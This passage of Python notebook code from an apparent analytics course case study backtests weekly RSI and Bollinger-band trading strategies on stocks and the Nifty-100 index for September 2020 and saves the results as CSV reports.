    weekly_money = weekly_money + total_sell_value - total_buy_value
    # Keep in the portfolio only what was not sold this week.
    temp_portfolio = []
    stock_in_portfolio.append(add_stock)
    for item in stock_in_portfolio:
        if item not in remove_stock:
            temp_portfolio.append(item)
    stock_in_portfolio = temp_portfolio
    # Split the consolidate list into multiple lists with 6 columns each for the list row
    n = 6
    Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
    Buy_Sell_dataframe_r = []
    # move to dataframe
    Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
    if len(Buy_Sell_list_r) > 0:
        Buy_Sell_dataframe_r.columns = ['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty']
        # calculate the value
        Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
    #Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
    return(Buy_Sell_dataframe_r, stock_in_portfolio, weekly_money)
# -
## SUMMARIZE FOR REPORTING for BACKTESTING
def Summarize_Report_Weekly (stock_index, kpi, criteria, temp_data):
buy_value = 0
buy_count = 0
sell_value = 0
sell_count = 0
profit_loss = 0
list1 = []
list2 = []
for row_index, row in temp_data.iterrows():
weeknum = row['Week#']
if (row['Txn'] == "Buy") :
buy_value = buy_value + row['Value']
buy_count = buy_count + 1
else:
sell_value = sell_value + row['Value']
sell_count = sell_count + 1
list1.append(stock_index)
list1.append(kpi)
list1.append(criteria)
list1.append(weeknum)
list1.append("Buy")
list1.append(buy_value)
list1.append(buy_count)
list1.append(stock_index)
list1.append(kpi)
list1.append(criteria)
list1.append(weeknum)
list1.append("Sell")
list1.append(sell_value)
list1.append(sell_count)
# calculate net profit (Sell - Buy)
profit_loss = sell_value - buy_value
list2.append(stock_index)
list2.append(kpi)
list2.append(criteria)
list2.append(profit_loss)
list2.append(investment)
list2.append(sell_count)
roi = (profit_loss/investment)*100
list2.append(roi)
# add the rows to dataframe - CONSOLIDATED REPORT
n = 7
add_rows_split = []
add_rows_split = list(divide_chunks(list1, n))
temp1_df = pd.DataFrame(add_rows_split, columns=['Stock/Index', 'KPI', 'Criteria', 'Week#', 'Transaction', 'Value', 'Number of Txns'])
# Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp_df])
# add the rows to dataframe - SUMMARY REPORT
n = 7
add_rows_split = []
add_rows_split = list(divide_chunks(list2, n))
temp2_df = pd.DataFrame(add_rows_split, columns=['Stock/Index', 'KPI', 'Criteria', 'Net Profit/Loss', 'Investment', 'Number of Txns', 'ROI'])
# Summary_Report_df = pd.concat([Summary_Report_df, temp_df])
return temp1_df, temp2_df
# PORTFOLIO 2
# Weekly back-test for September 2020 using the price-change based
# (portfolio 2) stock selection; results are accumulated in
# consolidated_portfolio and leftover cash carried from week to week.
week_start_dates = ['2020-08-31', '2020-09-07', '2020-09-14', '2020-09-21', '2020-09-28']
week_end_dates = ['2020-09-04', '2020-09-11', '2020-09-18', '2020-09-25', '2020-10-02']
#week_start_dates = ['2010-01-04']
#week_end_dates = ['2020-08-31']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
stock_in_portfolio = []
stock_to_sell = []
remove_stock = []
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
    week_start = week_start_dates [i]
    week_end = week_end_dates [i]
    mask = ((daily_data['Date'] >= week_start) & (daily_data['Date'] <= week_end))
    weekly_data = daily_data.loc[mask]
    weekly_data_selected = weekly_portfolio_stock_selection (weekly_data)
    # NOTE(review): "Week".join(str(i)) is just str(i) for single-digit i;
    # "Week" + str(i) was probably intended.
    week_number = str("Week".join(str(i)))
    if i == 0:
        available_money = portfolio_money
    weekly_portfolio, stock_in_portfolio, money_available = weekly_stock_buy_and_sell(weekly_data_selected, week_number, stock_in_portfolio, available_money)
    consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
    available_money = money_available
    i = i + 1
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
# +
# add the rows to dataframe which are in Buy position but have not been sold.
# Take the price as on 01st Oct as the price for book-closure, i.e. any
# position still open at month end is force-sold at the 01-Oct close so the
# period P&L can be computed.
add_rows_list = []
row_count = consolidated_portfolio.shape[0]
i = 0
for index_row, row in consolidated_portfolio.iterrows():
    if i == 0:
        # Remember the first row; decisions are made when the symbol changes.
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            # Previous symbol ended on an open Buy: synthesize its closing Sell.
            add_rows_list.append(week_number)
            date = "2020-10-01"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = weekly_data[(weekly_data['Symbol'] == last_symbol) & (weekly_data['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
    if ((i == row_count) and (row['Txn'] == "Buy")):
        # Very last row is an open Buy: close it out as well.
        add_rows_list.append(week_number)
        date = "2020-10-01"
        add_rows_list.append(date) # Date
        add_rows_list.append(row['Symbol']) # Symbol
        add_rows_list.append("Sell") # Sell
        price = weekly_data[(weekly_data['Symbol'] == row['Symbol']) & (weekly_data['Date'] == date)]['Close'].values[0]
        add_rows_list.append(price) # Close price per the last date for that stock
        add_rows_list.append(row['Qty']) # qty
        value = price * row['Qty']
        add_rows_list.append(value)
        last_txn = row['Txn']
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 7
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([consolidated_portfolio, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the column headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Summarize in a dataframe: per symbol, Sell total minus Buy total
# (NOTE(review): .mul(100) scales the difference by 100 - confirm intended)
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# #### RETURNS FOR SEP'20 ---- NOT ALIGNED TO THE RETURNS FOR STOCKS SEEN OVER PAST 10 YEARS
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
# Append the Sep'20 portfolio-2 results to the running report DataFrames.
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Stock - Sep", "Portfolio2: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
# PORTFOLIO 3
# Weekly back-test for September 2020 using the volume-change based
# (portfolio 3) stock selection.
week_start_dates = ['2020-08-31', '2020-09-07', '2020-09-14', '2020-09-21', '2020-09-28']
week_end_dates = ['2020-09-04', '2020-09-11', '2020-09-18', '2020-09-25', '2020-10-02']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
stock_in_portfolio = []
stock_to_sell = []
remove_stock = []
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
    week_start = week_start_dates [i]
    week_end = week_end_dates [i]
    mask = ((daily_data['Date'] >= week_start) & (daily_data['Date'] <= week_end))
    weekly_data = daily_data.loc[mask]
    # FIX: this run is labelled PORTFOLIO 3 and reported as "Portfolio3"
    # below, but it previously called the portfolio-2 (price-change)
    # selection; use the volume-change selection instead.
    weekly_data_selected = weekly_portfolio3_stock_selection (weekly_data)
    # NOTE(review): "Week".join(str(i)) is just str(i) for single-digit i;
    # "Week" + str(i) was probably intended.
    week_number = str("Week".join(str(i)))
    if i == 0:
        available_money = portfolio_money
    weekly_portfolio, stock_in_portfolio, money_available = weekly_stock_buy_and_sell(weekly_data_selected, week_number, stock_in_portfolio, available_money)
    consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
    available_money = money_available
    i = i + 1
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
# +
# add the rows to dataframe which are in Buy position but have not been sold.
# Take the price as on 01st Oct as the price for book-closure: force-sell any
# position still open at month end at the 01-Oct close.
add_rows_list = []
row_count = consolidated_portfolio.shape[0]
i = 0
for index_row, row in consolidated_portfolio.iterrows():
    if i == 0:
        # Remember the first row; decisions are made when the symbol changes.
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            # Previous symbol ended on an open Buy: synthesize its closing Sell.
            add_rows_list.append(week_number)
            date = "2020-10-01"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = weekly_data[(weekly_data['Symbol'] == last_symbol) & (weekly_data['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
    if ((i == row_count) and (row['Txn'] == "Buy")):
        # Very last row is an open Buy: close it out as well.
        add_rows_list.append(week_number)
        date = "2020-10-01"
        add_rows_list.append(date) # Date
        add_rows_list.append(row['Symbol']) # Symbol
        add_rows_list.append("Sell") # Sell
        price = weekly_data[(weekly_data['Symbol'] == row['Symbol']) & (weekly_data['Date'] == date)]['Close'].values[0]
        add_rows_list.append(price) # Close price per the last date for that stock
        add_rows_list.append(row['Qty']) # qty
        value = price * row['Qty']
        add_rows_list.append(value)
        last_txn = row['Txn']
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 7
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([consolidated_portfolio, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the column headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Summarize in a dataframe: per symbol, Sell total minus Buy total
# (NOTE(review): .mul(100) scales the difference by 100 - confirm intended)
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
# Append the Sep'20 portfolio-3 results to the running report DataFrames.
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Stock - Sep", "Portfolio3: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
# store the data as CSV files.
# FIX: use raw strings for the Windows paths so the backslashes can never be
# interpreted as escape sequences (non-raw "\P", "\O", ... already trigger
# DeprecationWarning and will become a SyntaxError).
Buy_Sell_Summary_r.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Summary Sep-20.csv')
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Txn details Sep-20.csv')
# PORTFOLIO 1
# Weekly back-test for September 2020 using the MACD(4,15)/Close based
# (portfolio 1) stock selection.
week_start_dates = ['2020-08-31', '2020-09-07', '2020-09-14', '2020-09-21', '2020-09-28']
week_end_dates = ['2020-09-04', '2020-09-11', '2020-09-18', '2020-09-25', '2020-10-02']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
stock_in_portfolio = []
stock_to_sell = []
remove_stock = []
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
    week_start = week_start_dates [i]
    week_end = week_end_dates [i]
    mask = ((daily_data['Date'] >= week_start) & (daily_data['Date'] <= week_end))
    weekly_data = daily_data.loc[mask]
    weekly_data_selected = weekly_portfolio1_stock_selection (weekly_data)
    # NOTE(review): "Week".join(str(i)) is just str(i) for single-digit i;
    # "Week" + str(i) was probably intended.
    week_number = str("Week".join(str(i)))
    if i == 0:
        available_money = portfolio_money
    weekly_portfolio, stock_in_portfolio, money_available = weekly_stock_buy_and_sell(weekly_data_selected, week_number, stock_in_portfolio, available_money)
    consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
    available_money = money_available
    i = i + 1
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
# +
# add the rows to dataframe which are in Buy position but have not been sold.
# Take the price as on 01st Oct as the price for book-closure: force-sell any
# position still open at month end at the 01-Oct close.
add_rows_list = []
row_count = consolidated_portfolio.shape[0]
i = 0
for index_row, row in consolidated_portfolio.iterrows():
    if i == 0:
        # Remember the first row; decisions are made when the symbol changes.
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            # Previous symbol ended on an open Buy: synthesize its closing Sell.
            add_rows_list.append(week_number)
            date = "2020-10-01"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = weekly_data[(weekly_data['Symbol'] == last_symbol) & (weekly_data['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
    if ((i == row_count) and (row['Txn'] == "Buy")):
        # Very last row is an open Buy: close it out as well.
        add_rows_list.append(week_number)
        date = "2020-10-01"
        add_rows_list.append(date) # Date
        add_rows_list.append(row['Symbol']) # Symbol
        add_rows_list.append("Sell") # Sell
        price = weekly_data[(weekly_data['Symbol'] == row['Symbol']) & (weekly_data['Date'] == date)]['Close'].values[0]
        add_rows_list.append(price) # Close price per the last date for that stock
        add_rows_list.append(row['Qty']) # qty
        value = price * row['Qty']
        add_rows_list.append(value)
        last_txn = row['Txn']
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 7
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([consolidated_portfolio, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the column headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Summarize in a dataframe: per symbol, Sell total minus Buy total
# (NOTE(review): .mul(100) scales the difference by 100 - confirm intended)
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
# Append the Sep'20 portfolio-1 results to the running report DataFrames.
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Stock - Sep", "Portfolio1: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
# PORTFOLIO 3
# Second Sep'20 run, this time with the volume-change based (portfolio 3)
# stock selection function.
week_start_dates = ['2020-08-31', '2020-09-07', '2020-09-14', '2020-09-21', '2020-09-28']
week_end_dates = ['2020-09-04', '2020-09-11', '2020-09-18', '2020-09-25', '2020-10-02']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
stock_in_portfolio = []
stock_to_sell = []
remove_stock = []
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
    week_start = week_start_dates [i]
    week_end = week_end_dates [i]
    mask = ((daily_data['Date'] >= week_start) & (daily_data['Date'] <= week_end))
    weekly_data = daily_data.loc[mask]
    weekly_data_selected = weekly_portfolio3_stock_selection (weekly_data)
    # NOTE(review): "Week".join(str(i)) is just str(i) for single-digit i;
    # "Week" + str(i) was probably intended.
    week_number = str("Week".join(str(i)))
    if i == 0:
        available_money = portfolio_money
    weekly_portfolio, stock_in_portfolio, money_available = weekly_stock_buy_and_sell(weekly_data_selected, week_number, stock_in_portfolio, available_money)
    consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
    available_money = money_available
    i = i + 1
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
# +
# add the rows to dataframe which are in Buy position but have not been sold.
# Take the price as on 01st Oct as the price for book-closure: force-sell any
# position still open at month end at the 01-Oct close.
add_rows_list = []
row_count = consolidated_portfolio.shape[0]
i = 0
for index_row, row in consolidated_portfolio.iterrows():
    if i == 0:
        # Remember the first row; decisions are made when the symbol changes.
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            # Previous symbol ended on an open Buy: synthesize its closing Sell.
            add_rows_list.append(week_number)
            date = "2020-10-01"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = weekly_data[(weekly_data['Symbol'] == last_symbol) & (weekly_data['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
    if ((i == row_count) and (row['Txn'] == "Buy")):
        # Very last row is an open Buy: close it out as well.
        add_rows_list.append(week_number)
        date = "2020-10-01"
        add_rows_list.append(date) # Date
        add_rows_list.append(row['Symbol']) # Symbol
        add_rows_list.append("Sell") # Sell
        price = weekly_data[(weekly_data['Symbol'] == row['Symbol']) & (weekly_data['Date'] == date)]['Close'].values[0]
        add_rows_list.append(price) # Close price per the last date for that stock
        add_rows_list.append(row['Qty']) # qty
        value = price * row['Qty']
        add_rows_list.append(value)
        last_txn = row['Txn']
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 7
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([consolidated_portfolio, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the column headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Summarize in a dataframe: per symbol, Sell total minus Buy total
# (NOTE(review): .mul(100) scales the difference by 100 - confirm intended)
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
# Append the Sep'20 portfolio-3 results to the running report DataFrames.
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Stock - Sep", "Portfolio3: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
# store the data as CSV files.
# NOTE(review): files are named "Portfolio1" although this run is reported
# as Portfolio3 above - confirm the intended file names.
# FIX: raw strings so the Windows-path backslashes are never interpreted as
# escape sequences.
Buy_Sell_Summary_r.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Summary Portfolio1 Sep-20.csv')
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Txn details Portfolio1 Sep-20.csv')
# +
## DO THE TESTING FOR NIFTY FOR THE MONTH OF SEP2020
# -
# TESTING FOR 31-Aug until 01-Oct 2020 - NIFTY
# RSI>25 and Bollinger - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
def weekly_nifty_buy_and_sell (weekly_data_nifty, week_num, weekly_money):
    """Simulate one week of Bollinger + RSI trades on the Nifty index data.

    Buy when Bollinger says "Buy" and RSI > 25; sell when Bollinger says
    "Sell" and RSI <= 25.  Returns (transactions_dataframe, remaining_money).
    Relies on the module-level globals `divide_chunks` and `portfolio_money`.
    """
    weekly_data_nifty['TradingStrategyRSI_revised'] = np.where(weekly_data_nifty['rsi'] > 25, "positive", "negative")
    df_nifty = weekly_data_nifty
    Back_Test_10yrs = []
    i = 0 # for each group_key or Symbol
    j = 0 # for each row in the symbol
    next_step = 1 # 1 - Buy, 0 - Sell
    total_buy_value = 0
    total_sell_value = 0
    qty = 0  # NOTE(review): assigned but never used below
    for row_index, row in df_nifty.iterrows():
        buy_value = 0
        sell_value = 0
        if i <= df_nifty.index[-1] :
            if next_step == 0:
                # Currently holding: look for a sell signal.
                if df_nifty.loc[row_index, 'TradingStrategyBollinger'] == "Sell":
                    if df_nifty.loc[row_index, 'TradingStrategyRSI_revised'] == "negative":
                        Back_Test_10yrs.append(week_num)
                        Back_Test_10yrs.append(row['Date'])
                        Back_Test_10yrs.append("Sell")
                        Back_Test_10yrs.append(row['Close'])
                        Back_Test_10yrs.append(number_stock)
                        sell_value = number_stock * row['Close']
                        Back_Test_10yrs.append(sell_value)
                        total_sell_value = total_sell_value + sell_value
                        next_step = 1
                        j = j + 1
            else: # first time I have to buy
                if weekly_money > 0:
                    if df_nifty.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
                        if df_nifty.loc[row_index, 'TradingStrategyRSI_revised'] == "positive":
                            # NOTE(review): sizes the position from the GLOBAL
                            # portfolio_money, not the weekly_money parameter -
                            # confirm intended.
                            number_stock = portfolio_money // row['Close'] # floor division to get the integer number of stocks
                            Back_Test_10yrs.append(week_num)
                            Back_Test_10yrs.append(row['Date'])
                            Back_Test_10yrs.append("Buy")
                            Back_Test_10yrs.append(row['Close'])
                            Back_Test_10yrs.append(number_stock)
                            buy_value = number_stock * row['Close']
                            Back_Test_10yrs.append(buy_value)
                            total_buy_value = total_buy_value + buy_value
                            next_step = 0
                            j = j + 1
        i = i + 1
    Back_Test_10yrs
    # Cash left after this week's buys and sells.
    weekly_money = weekly_money + total_sell_value - total_buy_value
    # Split the consolidate list into multiple lists with 5 columns each for the list row
    n = 6
    Buy_Sell_list = list(divide_chunks(Back_Test_10yrs, n))
    # move the list to dataframe
    Buy_Sell_dataframe_nifty_w = pd.DataFrame(Buy_Sell_list)
    Buy_Sell_dataframe_nifty_w
    return(Buy_Sell_dataframe_nifty_w, weekly_money)
## FOR TESTING FOR THE PERIOD FROM 31-AUG-2020 until 01-OCT-2020
## SELECT THE DAILY_DATA TO REFLECT JUST THIS DATA AND NOT THE DATA UNTIL 31-AUG-2020
# Weekly Nifty-100 back-test for September 2020, carrying cash week to week.
week_start_dates = ['2020-08-31', '2020-09-07', '2020-09-14', '2020-09-21', '2020-09-28']
week_end_dates = ['2020-09-04', '2020-09-11', '2020-09-18', '2020-09-25', '2020-10-02']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
    week_start = week_start_dates [i]
    week_end = week_end_dates [i]
    mask = ((daily_nifty100['Date'] >= week_start) & (daily_nifty100['Date'] <= week_end))
    weekly_data_nifty100 = daily_nifty100.loc[mask]
    # NOTE(review): "Week".join(str(i)) is just str(i) for single-digit i;
    # "Week" + str(i) was probably intended.
    week_number = str("Week".join(str(i)))
    if i == 0:
        available_money = portfolio_money
    weekly_portfolio, money_available = weekly_nifty_buy_and_sell(weekly_data_nifty100, week_number, available_money)
    consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
    available_money = money_available
    i = i + 1
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
consolidated_portfolio
# +
# add the rows to dataframe which are in Buy position but have not been sold.
# Take the price as on the last available day as the price for book-closure:
# if the final transaction is an open Buy, synthesize its closing Sell.
add_rows_list = []
i = 0
last_txn = consolidated_portfolio.tail(1)[2] # pick the second column - pertaining to transaction
if (last_txn == "Buy").bool():
    add_rows_list.append(i)
    date = "2020-10-01"
    add_rows_list.append(date) # Date
    add_rows_list.append("Sell") # Sell
    price = daily_nifty100['Close'].tail(1).values[0]
    add_rows_list.append(price) # Close price per the last date for that stock
    qty = consolidated_portfolio.tail(1)[4].values[0] # Qty for last date of that stock
    add_rows_list.append(qty) # qty
    value = price * qty
    add_rows_list.append(value)
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Txn Price Qty
concat_Buy_Sell = pd.DataFrame( np.concatenate( (consolidated_portfolio.values, add_rows_df.values), axis=0 ) )
concat_Buy_Sell.columns = [ 'Week#', 'Date', 'Txn', 'Close', 'Qty', 'Value' ]
# -
## Summarize per the requirement
# Pieces of the human-readable summary line assembled further below.
Line1 = "I am Rajesh. My portfolio has"
Line2 = "stocks. These are: "
Stock_list = portfolio_stock_name
Num_stocks = portfolio_num_stock
# convert list to string for stock_list
def ListToString (s):
    """Concatenate the elements of *s* into one string, each element
    followed by a single space (e.g. ['A', 'B'] -> 'A B ').

    Uses str.join instead of repeated += concatenation, which can be
    quadratic; str() also accepts non-string elements safely.
    """
    return "".join(str(ele) + " " for ele in s)
stock_string = ListToString(Stock_list)
# #### SUMMARIZATION FOR SEP'20 BASED ON STOCK PORTFOLIO & NIFTY
# Human-readable header plus the Nifty Sep'20 report rows.
concat_header = Line1 + str(Num_stocks) + Line2 + stock_string
concat_header
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Nifty - Sep", "Portfolio2: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
# store the data as CSV files.
# FIX: raw strings so the Windows-path backslashes are never interpreted as
# escape sequences.
Buy_Sell_Summary_r.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Summary Sep-20.csv')
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Txn details Sep-20.csv')
# ## PROCESS THE OCT AND NOV DATA
# ### process the stock information
## data selection for each week (Oct and Nov 2020)
week_start_dates = ['2020-10-05', '2020-10-12', '2020-10-19', '2020-10-26', '2020-11-02', '2020-11-09', '2020-11-16', '2020-11-23']
week_end_dates = ['2020-10-09', '2020-10-16', '2020-10-23', '2020-10-30', '2020-11-06', '2020-11-13', '2020-11-20', '2020-11-27']
mask = ((daily_data['Date'] >= '2020-10-05') & (daily_data['Date'] <= '2020-11-27'))
daily_data_oct_nov_2020 = daily_data.loc[mask]
week_end = week_end_dates[0]
# Weekly back-test over Oct-Nov 2020 with the portfolio-2 (price-change)
